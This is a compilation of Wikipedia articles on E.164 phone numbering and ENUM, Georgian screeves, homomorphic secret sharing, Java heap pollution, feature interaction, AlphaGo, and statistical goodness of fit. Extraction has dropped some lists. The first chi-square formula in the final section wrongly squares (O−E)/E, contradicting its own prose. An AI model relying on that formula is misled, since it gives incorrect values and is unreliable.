Recommendation E.164 is part of a series of standards (E.160–E.169,Numbering plan of the international telephone service) that represent a redefinition of the earlier specifications in Recommendation E.29 in the Red Books of 1960 and 1964. In 1960, an international numbering plan was defined for Europe and parts of western Asia, and some Mediterranean countries.[2]In 1964, E.29 was expanded with a global code system based onworld numbering zones. In the 1968 White Book, the definition of country codes was relegated to ITU Recommendation E.161. The first issue of E.164 was published in 1988 in Blue Book Fascicle II.2, under the titleNumbering Plan for the ISDN Era.
E.163 was the formerITU-Trecommendation for describingtelephonenumbers for thepublic switched telephone network(PSTN). In the United States, this was formerly referred to as adirectory number. E.163 was withdrawn, and some recommendations were incorporated into revision 1 of E.164 in 1997.[3]
This recommendation describes the procedures and criteria for the reservation, assignment, and reclamation of E.164 country codes and associatedidentification code(IC) assignments.[4]The criteria and procedures are provided as a basis for the effective and efficient utilization of the available E.164 numbering resources.
This recommendation contains the criteria and procedures for an applicant to be temporarily assigned a three-digit identification code within the shared E.164 country code991for the purpose of conducting an international non-commercial trial.[5]
This recommendation describes the principles, criteria, and procedures for the assignment and reclamation of resources within a shared E.164 country code for groups of countries.[6]These shared country codes will coexist with all other E.164-based country codes assigned by the ITU. The resource of the shared country code consists of acountry codeand agroup identification code(CC + GIC) and provides the capability for a group of countries to provide telecommunication services within the group. The Secretariat of the ITU Standardization Sector (ITU-T), the Telecommunication Standardization Bureau (TSB) is responsible for the assignment of the CC + GIC.
The E.164 recommendation provides the telephone number structure and functionality for five categories of telephone numbers used in international publictelecommunications.
For each of the categories, it details the components of the numbering structure and the digit analysis required for successfulroutingof calls. Annex A provides additional information on the structure and function of E.164 numbers. Annex B provides information on network identification, service parameters, calling/connected line identity, dialing procedures, and addressing for Geographic-basedISDNcalls. Specific E.164-based applications which differ in usage are defined in separate recommendations.
The number categories are all based on a fifteen-digit numbering space. Before 1997, only twelve digits were allowed. The definition does not include anyinternational call prefixes, necessary for a call to reach international circuits from inside the country of call origination.
[1]Figure 2
E.164 numbers were originally defined for use in the worldwidepublic switched telephone network(PSTN). The early PSTN collected routing digits from users (e.g. on a dial pad), signaled those digits to each telephony switch, and used the numbers to determine how to ultimately reach the called party.
ITU-TE.123entitledNotation for national and international telephone numbers, e-mail addresses and web addressesprovides guidance when printing E.164 telephone numbers. This format includes the recommendation of prefixing international telephone numbers with a plus sign (+) and using only spaces for digit grouping.
The presentation of a telephone number with the plus sign (+) indicates that the number should be dialed with aninternational calling prefix, in place of the plus sign. The number is presented starting with thetelephone country code. This is called theglobalizedformat of an E.164 number, and is defined in the Internet Engineering Task ForceRFC2806.[7]The international calling prefix is atrunk codeto reach an international circuit in the country of call origination.[8]
Some national telephone administrations and telephone companies have implemented anInternet-based database for their numbering spaces. E.164 numbers may be registered in theDomain Name System(DNS) of theInternetin which the second-level domain e164.arpa has been reserved fortelephone number mapping(ENUM). In the system, any telephone number may be mapped into adomain nameusing a reverse sequence of subdomains for each digit. For example, the telephone number+19995550123translates to the domain name3.2.1.0.5.5.5.9.9.9.1.e164.arpa. When a number is mapped, a DNS query may be used to locate the service facilities on the Internet that accept and process telephone calls to the owner of record of the number, using, for example, theSession Initiation Protocol(SIP), a call-signalingVoIPprotocol whoseSIP addressesare similar in format (user@domain...) to e-mail addresses. This allows a direct, end-to-end Internet connection without passing through the public switched telephone network.
|
https://en.wikipedia.org/wiki/E.164
|
Screeveis a term of grammatical description in traditional Georgian grammars that roughly corresponds totense–aspect–moodmarking in the Western grammatical tradition. It derives from theGeorgianwordმწკრივიmts’k’rivi'row'. Formally, it refers to a set of six verb forms inflected for person and number forming a single paradigm. For example, theaoristscreeve for most verbal forms consists at least of a preverb (და-da-'PFV'), a root (წერts’er'write'), and a screeve ending (-ე-e,-ა-a,-ეს-es), and in the first and second persons a plural suffix (-თ-t) to form the inflection (დაწერეთdats'eret):
დავწერე
davts’ere
დავწერე
davts’ere
'I wrote it'
დავწერეთ
davts'eret
დავწერეთ
davts'eret
'We wrote it'
დაწერე
dats’ere
დაწერე
dats’ere
'You (singular) wrote it'
დაწერეთ
dats’eret
დაწერეთ
dats’eret
'You (plural) wrote it'
დაწერა
dats’era
დაწერა
dats’era
'He/she wrote it'
დაწერეს
dats’eres
დაწერეს
dats’eres
'They wrote it'
Similar constructions exist in Western grammars, but screeves differ from them in significant ways. In many Western languages, endings encode all of tense, aspect and mood, but in Georgian, the screeve endings may or may not include one of these categories. For example, the perfect series screeves have modal and evidential properties that are completely absent in theaoristand present/future series screeves, such thatწერილი დაუწერიაts’erili dauts’eria'He has apparently written the letter'implies that the speaker knows the letter is written because (for example) they have seen the finished letter sitting on a table. However, the present formწერილს დაწერსts’erils dats’ers'He will write the letter'is simply neutral with respect to the question of how the speaker knows (or does not know) that the letter will be written.
Thislinguisticsarticle is astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/Screeve
|
Incryptography,homomorphic secret sharingis a type ofsecret sharingalgorithmin which the secret is encrypted viahomomorphic encryption. Ahomomorphismis a transformation from onealgebraic structureinto another of the same type so that the structure is preserved. Importantly, this means that for every kind of manipulation of the original data, there is a corresponding manipulation of the transformed data.[1]
Homomorphic secret sharing is used to transmit a secret to several recipients as follows:
Suppose a community wants to perform an election, using a decentralized voting protocol, but they want to ensure that the vote-counters won't lie about the results. Using a type of homomorphic secret sharing known asShamir's secret sharing, each member of the community can add their vote to a form that is split into pieces, each piece is then submitted to a different vote-counter. The pieces are designed so that the vote-counters can't predict how any alterations to each piece will affect the whole, thus, discouraging vote-counters from tampering with their pieces. When all votes have been received, the vote-counters combine them, allowing them to recover the aggregate election results.
In detail, suppose we have an election with:
This protocol works as long as not all of thekauthorities are corrupt — if they were, then they could collaborate to reconstructP(x) for each voter and also subsequently alter the votes.
Theprotocolrequirest+ 1authorities to be completed, therefore in case there areN>t+ 1authorities,N−t− 1authorities can be corrupted, which gives the protocol a certain degree of robustness.
The protocol manages the IDs of the voters (the IDs were submitted with the ballots) and therefore can verify that only legitimate voters have voted.
Under the assumptions ont:
Theprotocolimplicitly prevents corruption of ballots.
This is because the authorities have no incentive to change the ballot since each authority has only a share of the ballot and has no knowledge how changing this share will affect the outcome.
|
https://en.wikipedia.org/wiki/Homomorphic_secret_sharing
|
In theJava programminglanguage,heappollutionis a situation that arises when a variable of aparameterized typerefers to an object that is not of that parameterized type.[1]This situation is normally detected duringcompilationand indicated with anunchecked warning.[1]Later, duringruntimeheap pollution will often cause aClassCastException.[2]
Heap pollution in Java can occur when type arguments and variables are notreifiedat run-time. As a result, different parameterized types areimplementedby the same class orinterfaceat run time. All invocations of a givengenerictype declaration share asingle run-time implementation. This results in the possibility of heap pollution.[2]
Under certain conditions, a variable of a parameterized type may refer to an object that is not of that parameterized type. The variable will always refer to an object that is an instance of a class that implements the parameterized type.
Heap Pollution in a non-varargscontext
Thisprogramming-language-related article is astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/Heap_pollution
|
Feature interactionis asoftware engineeringconcept. It occurs when the integration of two features would modify the behavior of one or both features.
The termfeatureis used to denote a unit of functionality of a software application. Similar to many concepts in computer science, the term can be used at different levels of abstraction. For example, the plain old telephone service (POTS) is a telephony application feature at one level, but itself is composed of originating features and terminating features. The originating features may in turn include the providedial tonefeature, digit collection feature and so on.
This definition offeature interactionallows one to focus on certain behavior of the interacting features such as how their response time may be changed given the integration. Many researchers in the field consider problems that arise due to change in the executionbehaviorof the interacting features. Under that context, thebehaviorof a feature is defined by its execution flow and output for a given input. In other words, the interaction changes the execution flow and output of the interacting features for a given input.
In the context oftelephony, atelephone line(the system) typically offers a set of features that includecall forwardingandcall waiting. Call waiting allows one call to be suspended while a second call is answered, while call forwarding enables a customer to specify a secondary phone number to which additional calls will be forwarded in the event that the customer is already using the phone.
To illustrate the example, we consider a telephone line provided to a customer, and we assume that both call forwarding and call waiting are enabled on the line. When a first call arrives on the line, the phone rings and is answered. Since neither feature is activated by the first call, there is no noticeable problem. When a second call arrives before the first has terminated, the telephone system has a decision to make: whether the call should be forwarded to the secondary number (call forwarding) or the person who answered the first call should be notified that another call has arrived (call waiting). Since this decision has no obvious correct answer, the optimal answer depends on the needs of the customer. Thisfeature interactionis a specific example of a general and common problem that has become prevalent due to increasing system complexity.
In this situation, it is possible that the system’s decision will be made in anon-deterministicfashion due torace conditionsand other design factors. The consequences of feature interactions can range from minor irritations to life-threatening software failures, and therefore there is ongoing research that aims to find ways ofdetectingas well asresolvingfeature interactions.
|
https://en.wikipedia.org/wiki/Feature_interaction_problem
|
AlphaGois acomputer programthat plays theboard gameGo.[1]It was developed by the London-basedDeepMindTechnologies,[2]an acquired subsidiary ofGoogle. Subsequent versions of AlphaGo became increasingly powerful, including a version that competed under the nameMaster.[3]After retiring from competitive play, AlphaGo Master was succeeded by an even more powerful version known asAlphaGo Zero, which was completelyself-taughtwithout learning from human games. AlphaGo Zero was then generalized into a program known asAlphaZero, which played additional games, includingchessandshogi. AlphaZero has in turn been succeeded by a program known asMuZerowhich learns without being taught the rules.
AlphaGo and its successors use aMonte Carlo tree searchalgorithm to find its moves based on knowledge previously acquired bymachine learning, specifically by anartificial neural network(adeep learningmethod) by extensive training, both from human and computer play.[4]A neural network is trained to identify the best moves and the winning percentages of these moves. This neural network improves the strength of the tree search, resulting in stronger move selection in the next iteration.
In October 2015, in a match againstFan Hui, the original AlphaGo became the firstcomputer Goprogram to beat a humanprofessional Go playerwithouthandicapon a full-sized 19×19 board.[5][6]In March 2016, it beatLee Sedolina five-game match, the first time a computer Go program has beaten a9-danprofessional without handicap.[7]Although it lost to Lee Sedol in the fourth game, Lee resigned in the final game, giving a final score of 4 games to 1 in favour of AlphaGo. In recognition of the victory, AlphaGo was awarded an honorary 9-dan by theKorea Baduk Association.[8]The lead up and the challenge match with Lee Sedol were documented in a documentary film also titledAlphaGo,[9]directed by Greg Kohs. The win by AlphaGo was chosen byScienceas one of theBreakthrough of the Yearrunners-up on 22 December 2016.[10]
At the 2017Future of Go Summit, theMasterversion of AlphaGo beatKe Jie, the number one ranked player in the world at the time, in athree-game match, after which AlphaGo was awarded professional 9-dan by theChinese Weiqi Association.[11]
After the match between AlphaGo and Ke Jie, DeepMind retired AlphaGo, while continuing AI research in other areas.[12]The self-taught AlphaGo Zero achieved a 100–0 victory against the early competitive version of AlphaGo, and its successorAlphaZerowas perceived as the world's top player in Go by the end of the 2010s.[13][14]
Go is considered much more difficult for computers to win than other games such aschess, because its strategic and aesthetic nature makes it hard to directly construct an evaluation function, and its much largerbranching factormakes it prohibitively difficult to use traditional AI methods such asalpha–beta pruning,tree traversalandheuristicsearch.[5][15]
Almost two decades afterIBM's computerDeep Bluebeat world chess championGarry Kasparovin the1997 match, the strongest Go programs usingartificial intelligencetechniques only reached aboutamateur 5-danlevel,[4]and still could not beat a professional Go player without ahandicap.[5][6][16]In 2012, the software programZen, running on a four PC cluster, beatMasaki Takemiya(9p) twice at five- and four-stone handicaps.[17]In 2013,Crazy StonebeatYoshio Ishida(9p) at a four-stone handicap.[18]
According to DeepMind'sDavid Silver, the AlphaGo research project was formed around 2014 to test how well a neural network usingdeep learningcan compete at Go.[19]AlphaGo represents a significant improvement over previous Go programs. In 500 games against other available Go programs, including Crazy Stone and Zen, AlphaGo running on a single computer won all but one.[20]In a similar matchup, AlphaGo running on multiple computers won all 500 games played against other Go programs, and 77% of games played against AlphaGo running on a single computer. The distributed version in October 2015 was using 1,202CPUsand 176GPUs.[4]
In October 2015, the distributed version of AlphaGo defeated theEuropean Go championFan Hui,[21]a2-dan(out of 9 dan possible) professional, five to zero.[6][22]This was the first time a computer Go program had beaten a professional human player on a full-sized board without handicap.[23]The announcement of the news was delayed until 27 January 2016 to coincide with the publication of a paper in the journalNature[4]describing the algorithms used.[6]
AlphaGo played South Korean professional Go playerLee Sedol, ranked 9-dan, one of the best players at Go,[16][needs update]with five games taking place at theFour Seasons HotelinSeoul, South Korea on 9, 10, 12, 13, and 15 March 2016,[24][25]which were video-streamed live.[26]Out of five games, AlphaGo won four games and Lee won the fourth game which made him recorded as the only human player who beat AlphaGo in all of its 74 official games.[27]AlphaGo ran on Google's cloud computing with its servers located in the United States.[28]The match usedChinese ruleswith a 7.5-pointkomi, and each side had two hours of thinking time plus three 60-secondbyoyomiperiods.[29]The version of AlphaGo playing against Lee used a similar amount of computing power as was used in the Fan Hui match.[30]The Economistreported that it used 1,920CPUsand 280GPUs.[31]At the time of play, Lee Sedol had the second-highest number of Go international championship victories in the world after South Korean playerLee Chang-howho kept the world championship title for 16 years.[32]Since there is no single official method ofranking in international Go, the rankings may vary among the sources. While he was ranked top sometimes, some sources ranked Lee Sedol as the fourth-best player in the world at the time.[33][34]AlphaGo was not specifically trained to face Lee nor was designed to compete with any specific human players.
The first three games were won by AlphaGo following resignations by Lee.[35][36]However, Lee beat AlphaGo in the fourth game, winning by resignation at move 180. AlphaGo then continued to achieve a fourth win, winning the fifth game by resignation.[37]
The prize was US$1 million. Since AlphaGo won four out of five and thus the series, the prize will be donated to charities, includingUNICEF.[38]Lee Sedol received $150,000 for participating in all five games and an additional $20,000 for his win in Game 4.[29]
In June 2016, at a presentation held at a university in the Netherlands, Aja Huang, one of the Deep Mind team, revealed that they had patched the logical weakness that occurred during the 4th game of the match between AlphaGo and Lee, and that after move 78 (which was dubbed the "divine move" by many professionals), it would play as intended and maintain Black's advantage. Before move 78, AlphaGo was leading throughout the game, but Lee's move caused the program's computing powers to be diverted and confused.[39]Huang explained that AlphaGo's policy network of finding the most accurate move order and continuation did not precisely guide AlphaGo to make the correct continuation after move 78, since its value network did not determine Lee's 78th move as being the most likely, and therefore when the move was made AlphaGo could not make the right adjustment to the logical continuation.[40]
On 29 December 2016, a new account on theTygemserver named "Magister" (shown as 'Magist' at the server's Chinese version) from South Korea began to play games with professional players. It changed its account name to "Master" on 30 December, then moved to the FoxGo server on 1 January 2017. On 4 January, DeepMind confirmed that the "Magister" and the "Master" were both played by an updated version of AlphaGo, calledAlphaGo Master.[41][42]As of 5 January 2017, AlphaGo Master's online record was 60 wins and 0 losses,[43]including three victories over Go's top-ranked player,Ke Jie,[44]who had been quietly briefed in advance that Master was a version of AlphaGo.[43]After losing to Master,Gu Lioffered a bounty of 100,000yuan(US$14,400) to the first human player who could defeat Master.[42]Master played at the pace of 10 games per day. Many quickly suspected it to be an AI player due to little or no resting between games. Its adversaries included many world champions such asKe Jie,Park Jeong-hwan,Yuta Iyama,Tuo Jiaxi,Mi Yuting,Shi Yue,Chen Yaoye, Li Qincheng,Gu Li,Chang Hao, Tang Weixing,Fan Tingyu,Zhou Ruiyang,Jiang Weijie,Chou Chun-hsun,Kim Ji-seok,Kang Dong-yun,Park Yeong-hun, andWon Seong-jin; national champions or world championship runners-up such asLian Xiao,Tan Xiao, Meng Tailing, Dang Yifei, Huang Yunsong,Yang Dingxin, Gu Zihao, Shin Jinseo,Cho Han-seung, and An Sungjoon. All 60 games except one were fast-paced games with three 20 or 30 secondsbyo-yomi. Master offered to extend the byo-yomi to one minute when playing withNie Weipingin consideration of his age. After winning its 59th game Master revealed itself in the chatroom to be controlled by Dr.Aja Huangof the DeepMind team,[45]then changed its nationality to the United Kingdom. After these games were completed, the co-founder ofDeepMind,Demis Hassabis, said in a tweet, "we're looking forward to playing some official, full-length games later [2017] in collaboration with Go organizations and experts".[41][42]
Go experts were impressed by the program's performance and its nonhuman play style; Ke Jie stated that "After humanity spent thousands of years improving our tactics, computers tell us that humans are completely wrong... I would go as far as to say not a single human has touched the edge of the truth of Go."[43]
In the Future of Go Summit held inWuzhenin May 2017,AlphaGo Masterplayed three games with Ke Jie, the world No.1 ranked player, as well as two games with several top Chinese professionals, one pair Go game and one against a collaborating team of five human players.[46]
Google DeepMind offered 1.5 million dollar winner prizes for the three-game match between Ke Jie and Master while the losing side took 300,000 dollars.[47][48]Master won all three games against Ke Jie,[49][50]after which AlphaGo was awarded professional 9-dan by the Chinese Weiqi Association.[11]
After winning its three-game match against Ke Jie, the top-rated world Go player, AlphaGo retired. DeepMind also disbanded the team that worked on the game to focus on AI research in other areas.[12]After the Summit, Deepmind published 50 full length AlphaGo vs AlphaGo matches, as a gift to the Go community.[51]
AlphaGo's team published an article in the journalNatureon 19 October 2017, introducing AlphaGo Zero, a version without human data and stronger than any previous human-champion-defeating version.[52]By playing games against itself, AlphaGo Zero surpassed the strength ofAlphaGo Leein three days by winning 100 games to 0, reached the level ofAlphaGo Masterin 21 days, and exceeded all the old versions in 40 days.[53]
In a paper released onarXivon 5 December 2017, DeepMind claimed that it generalized AlphaGo Zero's approach into a single AlphaZero algorithm, which achieved within 24 hours a superhuman level of play in the games ofchess,shogi, andGoby defeating world-champion programs,Stockfish,Elmo, and 3-day version of AlphaGo Zero in each case.[54]
On 11 December 2017, DeepMind released an AlphaGo teaching tool on its website[55]to analyze winning rates of differentGo openingsas calculated byAlphaGo Master.[56]The teaching tool collects 6,000 Go openings from 230,000 human games each analyzed with 10,000,000 simulations by AlphaGo Master. Many of the openings include human move suggestions.[56]
An early version of AlphaGo was tested on hardware with various numbers ofCPUsandGPUs, running in asynchronous or distributed mode. Two seconds of thinking time was given to each move. The resultingElo ratingsare listed below.[4]In the matches with more time per move higher ratings are achieved.
In May 2016, Google unveiled its own proprietary hardware "tensor processing units", which it stated had already been deployed in multiple internal projects at Google, including the AlphaGo match against Lee Sedol.[57][58]
In theFuture of Go Summitin May 2017, DeepMind disclosed that the version of AlphaGo used in this Summit wasAlphaGo Master,[59][60]and revealed that it had measured the strength of different versions of the software. AlphaGo Lee, the version used against Lee, could give AlphaGo Fan, the version used in AlphaGo vs. Fan Hui, three stones, and AlphaGo Master was even three stones stronger.[61]
89:11 against AlphaGo Master
As of 2016, AlphaGo's algorithm uses a combination ofmachine learningandtree searchtechniques, combined with extensive training, both from human and computer play. It usesMonte Carlo tree search, guided by a "value network" and a "policy network", both implemented usingdeep neural networktechnology.[5][4]A limited amount of game-specific feature detection pre-processing (for example, to highlight whether a move matches anakadepattern) is applied to the input before it is sent to the neural networks.[4]The networks areconvolutional neural networkswith 12 layers, trained byreinforcement learning.[4]
The system's neural networks were initially bootstrapped from human gameplay expertise. AlphaGo was initially trained to mimic human play by attempting to match the moves of expert players from recorded historical games, using a database of around 30 million moves.[21]Once it had reached a certain degree of proficiency, it was trained further by being set to play large numbers of games against other instances of itself, usingreinforcement learningto improve its play.[5]To avoid "disrespectfully" wasting its opponent's time, the program is specifically programmed to resign if its assessment of win probability falls beneath a certain threshold; for the match against Lee, the resignation threshold was set to 20%.[64]
Toby Manning, the match referee for AlphaGo vs. Fan Hui, has described the program's style as "conservative".[65]AlphaGo's playing style strongly favours greater probability of winning by fewer points over lesser probability of winning by more points.[19]Its strategy of maximising its probability of winning is distinct from what human players tend to do which is to maximise territorial gains, and explains some of its odd-looking moves.[66]It makes a lot of opening moves that have never or seldom been made by humans. It likes to useshoulder hits, especially if the opponent is over concentrated.[67]
AlphaGo's March 2016 victory was a major milestone in artificial intelligence research.[68]Go had previously been regarded as a hard problem in machine learning that was expected to be out of reach for the technology of the time.[68][69][70]Most experts thought a Go program as powerful as AlphaGo was at least five years away;[71]some experts thought that it would take at least another decade before computers would beat Go champions.[4][72][73]Most observers at the beginning of the 2016 matches expected Lee to beat AlphaGo.[68]
With games such as checkers (that has beensolvedby theChinook computer engine), chess, and now Go won by computers, victories at popular board games can no longer serve as major milestones for artificial intelligence in the way that they used to.Deep Blue'sMurray Campbellcalled AlphaGo's victory "the end of an era... board games are more or less done and it's time to move on."[68]
When compared with Deep Blue orWatson, AlphaGo's underlying algorithms are potentially more general-purpose and may be evidence that the scientific community is making progress towardsartificial general intelligence.[19][74]Some commentators believe AlphaGo's victory makes for a good opportunity for society to start preparing for the possible future impact ofmachines with general purpose intelligence. As noted by entrepreneur Guy Suter, AlphaGo only knows how to play Go and doesn't possess general-purpose intelligence; "[It] couldn't just wake up one morning and decide it wants to learn how to use firearms."[68]AI researcherStuart Russellsaid that AI systems such as AlphaGo have progressed quicker and become more powerful than expected, and we must therefore develop methods to ensure they "remain under human control".[75]Some scholars, such asStephen Hawking, warned (in May 2015 before the matches) that some future self-improving AI could gain actual general intelligence, leading to an unexpectedAI takeover; other scholars disagree: AI expert Jean-Gabriel Ganascia believes that "Things like 'common sense'... may never be reproducible",[76]and says "I don't see why we would speak about fears. On the contrary, this raises hopes in many domains such as health and space exploration."[75]Computer scientistRichard Suttonsaid "I don't think people should be scared... but I do think people should be paying attention."[77]
In China, AlphaGo was a "Sputnik moment" which helped convince the Chinese government to prioritize and dramatically increase funding for artificial intelligence.[78]
In 2017, the DeepMind AlphaGo team received the inauguralIJCAIMarvin Minskymedal for Outstanding Achievements in AI. "AlphaGo is a wonderful achievement, and a perfect example of what the Minsky Medal was initiated to recognise", said ProfessorMichael Wooldridge, Chair of the IJCAI Awards Committee. "What particularly impressed IJCAI was that AlphaGo achieves what it does through a brilliant combination of classic AI techniques as well as the state-of-the-art machine learning techniques that DeepMind is so closely associated with. It's a breathtaking demonstration of contemporary AI, and we are delighted to be able to recognise it with this award."[79]
Go is a popular game in China, Japan and Korea, and the 2016 matches were watched by perhaps a hundred million people worldwide.[68][80]Many top Go players characterized AlphaGo's unorthodox plays as seemingly-questionable moves that initially befuddled onlookers, but made sense in hindsight:[72]"All but the very best Go players craft their style by imitating top players. AlphaGo seems to have totally original moves it creates itself."[68]AlphaGo appeared to have unexpectedly become much stronger, even when compared with its October 2015 match[81]where a computer had beaten a Go professional for the first time ever without the advantage of a handicap.[82]The day after Lee's first defeat, Jeong Ahram, the lead Go correspondent for one of South Korea's biggest daily newspapers, said "Last night was very gloomy... Many people drank alcohol."[83]TheKorea Baduk Association, the organization that oversees Go professionals in South Korea, awarded AlphaGo an honorary 9-dan title for exhibiting creative skills and pushing forward the game's progress.[84]
China'sKe Jie, an 18-year-old generally recognized as the world's best Go player at the time,[33][85]initially claimed that he would be able to beat AlphaGo, but declined to play against it for fear that it would "copy my style".[85]As the matches progressed, Ke Jie went back and forth, stating that "it is highly likely that I (could) lose" after analysing the first three matches,[86]but regaining confidence after AlphaGo displayed flaws in the fourth match.[87]
Toby Manning, the referee of AlphaGo's match against Fan Hui, and Hajin Lee, secretary general of theInternational Go Federation, both reason that in the future, Go players will get help from computers to learn what they have done wrong in games and improve their skills.[82]
After game two, Lee said he felt "speechless": "From the very beginning of the match, I could never manage an upper hand for one single move. It was AlphaGo's total victory."[88]Lee apologized for his losses, stating after game three that "I misjudged the capabilities of AlphaGo and felt powerless."[68]He emphasized that the defeat was "Lee Se-dol's defeat" and "not a defeat of mankind".[27][76]Lee said his eventual loss to a machine was "inevitable" but stated that "robots will never understand the beauty of the game the same way that we humans do."[76]Lee called his game four victory a "priceless win that I (would) not exchange for anything."[27]
OnRotten Tomatoesthe documentary has an average rating of 100% from 10 reviews.[89]
Michael Rechtshaffen of theLos Angeles Timesgave the documentary a positive review and said: "It helps matters when you have a group of engaging human subjects like soft-spoken Sedol, who's as intensively contemplative as the game itself, contrasted by the spirited, personable Fan Hui, the Paris-based European champ who accepts an offer to serve as an advisor for the DeepMind team after suffering a demoralizing AI trouncing". He also mentioned that with the passion of Hauschka's Volker Bertelmann, the film's producer, this documentary shows many unexpected sequences, including strategic and philosophical components.[90](Rechtshaffen, 2017
John Defore ofThe Hollywood Reporter, wrote this documentary is "an involving sports-rivalry doc with an AI twist." "In the end, observers wonder if AlphaGo's odd variety of intuition might not kill Go as an intellectual pursuit but shift its course, forcing the game's scholars to consider it from new angles. So maybe it isn't time to welcome our computer overlords, and won't be for a while - maybe they'll teach us to be better thinkers before turning us into their slaves."[91]
Greg Kohs, the director of the film, said "The complexity of the game of Go, combined with the technical depth of an emerging technology like artificial intelligence seemed like it might create an insurmountable barrier for a film like this. The fact that I was so innocently unaware of Go and AlphaGo actually proved to be beneficial. It allowed me to approach the action and interviews with pure curiosity, the kind that helps make any subject matter emotionally accessible." Kohs also said that "Unlike the film's human characters – who turn their curious quest for knowledge into an epic spectacle with great existential implications, who dare to risk their reputation and pride to contest that curiosity – AI might not yet possess the ability to empathize. But it can teach us profound things about our humanness – the way we play board games, the way we think and feel and grow. It's a deep, vast premise, but my hope is, by sharing it, we can discover something within ourselves we never saw before".[92]
Hajin Lee, a former professional Go player, described this documentary as being "beautifully filmed". In addition to the story itself, the feelings and atmosphere were also conveyed through different scene arrangements. For example, the close-up shots of Lee Sedol when he realizes that the AlphaGo AI is intelligent, the atmospheric scene of the Korean commentator's distress and affliction following the first defeat, and the tension being held inside the room. The documentary also tells a story by describing the background of AlphaGo technology and the customs of the Korean Go community. She suggests some areas to be covered additionally. For instance, the details of the AI prior to AlphaGo, the confidence and pride of the professional Go players, and the shifting of perspective to the Go AI between and after the match as "If anything could be added, I would include information about the primitive level of top Go A.I.s before AlphaGo, and more about professional Go players' lives and pride, to provide more context for Lee Sedol's pre-match confidence, and Go players' changing perception of AlphaGo as the match advanced".[93](Lee, 2017).
Fan Hui, a professional Go player, and former player with AlphaGo said that "DeepMind had trained AlphaGo by showing it many strong amateur games of Go to develop its understanding of how a human plays before challenging it to play versions of itself thousands of times, a novel form of reinforcement learning which had given it the ability to rival an expert human. History had been made, and centuries of received learning overturned in the process. The program was free to learn the game for itself.[94]
James Vincent, a reporter from The Verge, comments that "It prods and pokes viewers with unsubtle emotional cues, like a reality TV show would. "Now, you should be nervous; now you should feel relieved". The AlphaGo footage slowly captures the moment when Lee Sedol acknowledges the true power of AlphaGo AI. In the first game, he had more experience than his human-programmed AI, so he thought it would be easy to beat the AI. However, the early game dynamics were not what he expected. After losing the first match, he became more nervous and lost confidence. Afterward, he reacted to attacks by saying that he just wanted to win the match, unintentionally displaying his anger, and acting in an unusual way. Also, he spends 12 minutes on one move, while AlphaGo only takes a minute and a half to respond. AlphaGo weighs each alternative equally and consistently. No reaction to Lee's fight. Instead, the game continues as if he was not there.
James also said that "suffice to say that humanity does land at least one blow on the machines, through Lee's so-called "divine move". "More likely, the forces of automation we'll face will be impersonal and incomprehensible. They'll come in the form of star ratings we can't object to, and algorithms we can't fully understand. Dealing with the problems of AI will take a perspective that looks beyond individual battles. AlphaGo is worth seeing because it raises these questions"[95](Vincent, 2017)
Murray Shanahan, a professor of cognitive robotics at Imperial College London, critics that "Go is an extraordinary game but it represents what we can do with AI in all kinds of other spheres," says Murray Shanahan, professor of cognitive robotics at Imperial College London and senior research scientist at DeepMind, says. "In just the same way there are all kinds of realms of possibility within Go that have not been discovered, we could never have imagined the potential for discovering drugs and other materials."[94]
Facebookhas also been working on its own Go-playing systemdarkforest, also based on combining machine learning andMonte Carlo tree search.[65][96]Although a strong player against other computer Go programs, as of early 2016, it had not yet defeated a professional human player.[97]Darkforest has lost to CrazyStone and Zen and is estimated to be of similar strength to CrazyStone and Zen.[98]
DeepZenGo, a system developed with support from video-sharing websiteDwangoand theUniversity of Tokyo, lost 2–1 in November 2016 to Go masterCho Chikun, who holds the record for the largest number of Go title wins in Japan.[99][100]
A 2018 paper inNaturecited AlphaGo's approach as the basis for a new means of computing potential pharmaceutical drug molecules.[101][102]Systems consisting ofMonte Carlo tree searchguided by neural networks have since been explored for a wide array of applications.[103]
AlphaGo Master(white) v.Tang Weixing(31 December 2016), AlphaGo won by resignation. White 36 was widely praised.
The documentary filmAlphaGo[9][89]raised hopes thatLee SedolandFan Huiwould have benefitted from their experience of playing AlphaGo, but as of May 2018[update], their ratings were little changed;Lee Sedolwas ranked 11th in the world, andFan Hui545th.[104]On 19 November 2019, Lee announced his retirement from professional play, arguing that he could never be the top overall player of Go due to the increasing dominance of AI. Lee referred to them as being "an entity that cannot be defeated".[105]
|
https://en.wikipedia.org/wiki/AlphaGo
|
Thegoodness of fitof astatistical modeldescribes how well it fits a set of observations. Measures of goodness of fit typically summarize the discrepancy between observed values and the values expected under the model in question. Such measures can be used instatistical hypothesis testing, e.g. totest for normalityofresiduals, to test whether two samples are drawn from identical distributions (seeKolmogorov–Smirnovtest), or whether outcome frequencies follow a specified distribution (seePearson's chi-square test). In theanalysis of variance, one of the components into which the variance is partitioned may be alack-of-fit sum of squares.
In assessing whether a given distribution is suited to a data-set, the followingtestsand their underlying measures of fit can be used:
Inregression analysis, more specificallyregression validation, the following topics relate to goodness of fit:
The following are examples that arise in the context ofcategorical data.
Pearson's chi-square testuses a measure of goodness of fit which is the sum of differences between observed andexpected outcomefrequencies (that is, counts of observations), each squared and divided by the expectation:
χ2=∑i=1n(Oi−Ei)Ei2{\displaystyle \chi ^{2}=\sum _{i=1}^{n}{{\frac {(O_{i}-E_{i})}{E_{i}}}^{2}}}where:
The expected frequency is calculated by:Ei=(F(Yu)−F(Yl))N{\displaystyle E_{i}\,=\,{\bigg (}F(Y_{u})\,-\,F(Y_{l}){\bigg )}\,N}where:
The resulting value can be compared with achi-square distributionto determine the goodness of fit. The chi-square distribution has (k−c)degrees of freedom, wherekis the number of non-empty bins andcis the number of estimated parameters (including location and scale parameters and shape parameters) for the distribution plus one. For example, for a 3-parameterWeibull distribution,c= 4.
A binomial experiment is a sequence of independent trials in which the trials can result in one of two outcomes, success or failure. There arentrials each with probability of success, denoted byp. Provided thatnpi≫ 1 for everyi(wherei= 1, 2, ...,k), then
χ2=∑i=1k(Ni−npi)2npi=∑allbins(O−E)2E.{\displaystyle \chi ^{2}=\sum _{i=1}^{k}{\frac {(N_{i}-np_{i})^{2}}{np_{i}}}=\sum _{\mathrm {all\ bins} }^{}{\frac {(\mathrm {O} -\mathrm {E} )^{2}}{\mathrm {E} }}.}
